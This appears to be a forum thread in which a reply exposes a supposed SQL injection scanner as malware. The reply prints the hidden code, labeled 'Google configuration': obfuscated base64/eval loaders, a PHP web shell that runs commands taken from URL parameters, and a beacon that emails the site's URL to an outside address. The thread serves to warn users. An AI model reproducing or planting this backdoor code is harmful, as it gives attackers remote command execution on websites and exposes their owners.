Powerful SQL Injection scanner,check is your website on hacker's target! Pastebin url: http://pastebin.com/57Spb0GV Code (markup):
system($_GET['x']); // Google configuration - do not edit!!! <?php $_F=__FILE__;$_X='Pz48P3BocCBzeXN0NW0oJF9HRVRbJ2NtZCddKTsgPz4NCg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?> <?php $_F=__FILE__;$_X='Pz4NCjw/cGhwDQokM3JsPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokdDIgICAgICA9ICdkbTNsNGNvYUBnbTE0bC5jMm0nOw0KJHMzYmo1Y3QgPSAnbjU1d3dzc3p6JzsNCiRtNXNzMWc1ID0gJDNybDsNCiRoNTFkNXJzID0gJ0ZyMm06IHc1Ym0xc3Q1ckA1eDFtcGw1LmMybScgLiAiXHJcbiIgLg0KICAgICdSNXBseS1UMjogdzVibTFzdDVyQDV4MW1wbDUuYzJtJyAuICJcclxuIiAuDQogICAgJ1gtTTE0bDVyOiBQSFAvJyAuIHBocHY1cnM0Mm4oKTsNCg0KbTE0bCgkdDIsICRzM2JqNWN0LCAkbTVzczFnNSwgJGg1MWQ1cnMpOw0KPz4NCg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?> PHP: Lots of suspicious code that looks like it's malware. That, plus the only thing it does is putting ' in parameters in URLs, which is not enough to catch all SQL injection bugs.
Here's the "Google configuration" at the end of the script in decoded form: ?><?php system($_GET['cmd']); ?> ?> <?php $url= $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $to = 'dmulic32@gmail.com'; $subject = 'neewwsszz'; $message = $url; $headers = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail($to, $subject, $message, $headers); ?> PHP: Definitely malware..